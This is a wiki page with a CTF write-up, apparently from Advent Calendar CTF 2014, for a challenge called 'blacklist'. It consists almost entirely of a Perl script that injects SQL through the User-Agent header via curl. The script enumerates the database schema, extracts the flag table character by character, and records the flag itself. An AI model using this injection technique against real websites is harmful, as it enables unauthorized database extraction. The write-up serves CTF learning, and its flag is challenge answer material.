ログイン
編集不可のページディスカッション情報添付ファイル
ytoku/CTF/Writeup/AdventCalendarCTF2014/2014-12-11

MMA

blacklist

問題

We have stupid blacklist. The flag is in flag table.

blacklist.adctf2014.katsudon.org

source

メモ

解法

   1 use strict;
   2 use warnings;
   3 
   4 my $url = "http://blacklist.adctf2014.katsudon.org/";
   5 
   6 sub system_pipe {
   7     my @args = @_;
   8     open my $pipe, "-|", @args or return;
   9     my @result = <$pipe>;
  10     join "", @result;
  11 }
  12 
  13 sub extract_count_rows {
  14     my $from = shift;
  15     my $where = shift;
  16     
  17     my $where_clause;
  18     if ($where) { $where_clause = "WHERE $where" }
  19     else { $where_clause = "" }
  20     
  21     sleep 1;
  22     my $ua = "0' + (SELECT COUNT(*) FROM $from $where_clause) + '";
  23     my $result = system_pipe "curl", "-s", "-A", $ua, $url;
  24     if ($result =~ /<li>.*?"(.*?)"/) {
  25         return int($1);
  26     }
  27     else { die }
  28 }
  29 
  30 sub extract_length {
  31     my $row_at = shift;
  32     my $column = shift;
  33     my $from = shift;
  34     my $where = shift;
  35     
  36     my $where_clause;
  37     if ($where) { $where_clause = "WHERE $where" }
  38     else { $where_clause = "" }
  39     
  40     sleep 1;
  41     my $ua = "0' + (SELECT LENGTH($column) FROM $from $where_clause LIMIT $row_at,1) + '";
  42 #print $ua, "\n";
  43     my $result = system_pipe "curl", "-s", "-A", $ua, $url;
  44     if ($result =~ /<li>.*?"(.*?)"/) {
  45 #print $&, "\n";
  46         return int($1);
  47     }
  48     else { die }
  49 }
  50 
  51 sub extract_char {
  52     my $row_at = shift;
  53     my $char_at = shift;
  54     my $column = shift;
  55     my $from = shift;
  56     my $where = shift;
  57     
  58     my $where_clause;
  59     if ($where) { $where_clause = "WHERE $where" }
  60     else { $where_clause = "" }
  61     $char_at++;
  62     
  63     sleep 1;
  64     my $ua = "0' + (SELECT ORD(SUBSTR($column, $char_at, 1)) FROM $from $where_clause LIMIT $row_at,1) + '";
  65 #print $ua, "\n";
  66     my $result = system_pipe "curl", "-s", "-A", $ua, $url;
  67     if ($result =~ /<li>.*?"(.*?)"/) {
  68 #print $&, "\n";
  69         return chr($1);
  70     }
  71     else { die }
  72 }
  73 
  74 sub extract {
  75     my $column = shift;
  76     my $table = shift;
  77     my $where = shift;
  78     my @result;
  79     my $nrows = extract_count_rows($table, $where);
  80     for my $r (0..$nrows-1) {
  81         my $s = "";
  82         my $length = extract_length($r, $column, $table, $where);
  83         for my $i (0..$length-1) {
  84             $s .= extract_char($r, $i, $column, $table, $where);
  85         }
  86         push @result, $s;
  87     }
  88     return @result;
  89 }
  90 
  91 =comment
  92 print "$_\n"
  93     for extract("SCHEMA_NAME", "INFORMATION_SCHEMA.SCHEMATA");
  94 =comment
  95 information_schema
  96 blacklist
  97 =cut
  98 
  99 =comment
 100 print "$_\n"
 101     for extract("TABLE_NAME", "INFORMATION_SCHEMA.TABLES",
 102                 "TABLE_SCHEMA='blacklist'");
 103 =comment
 104 access_log
 105 flag
 106 =cut
 107 
 108 =comment
 109 print "$_\n"
 110     for extract("COLUMN_NAME", "INFORMATION_SCHEMA.COLUMNS",
 111                 "TABLE_SCHEMA='blacklist' AND TABLE_NAME='flag'");
 112 =comment
 113 flag is here!!!
 114 =cut
 115 
 116 print "$_\n" for extract("`flag is here!!!`", "blacklist.flag", "");
 117 # ADCTF_d0_NoT_Us3_FUcK1N_8l4ckL1sT

ytoku/CTF/Writeup/AdventCalendarCTF2014/2014-12-11 (最終更新日時 2014-12-11 15:09:17 更新者 ytoku)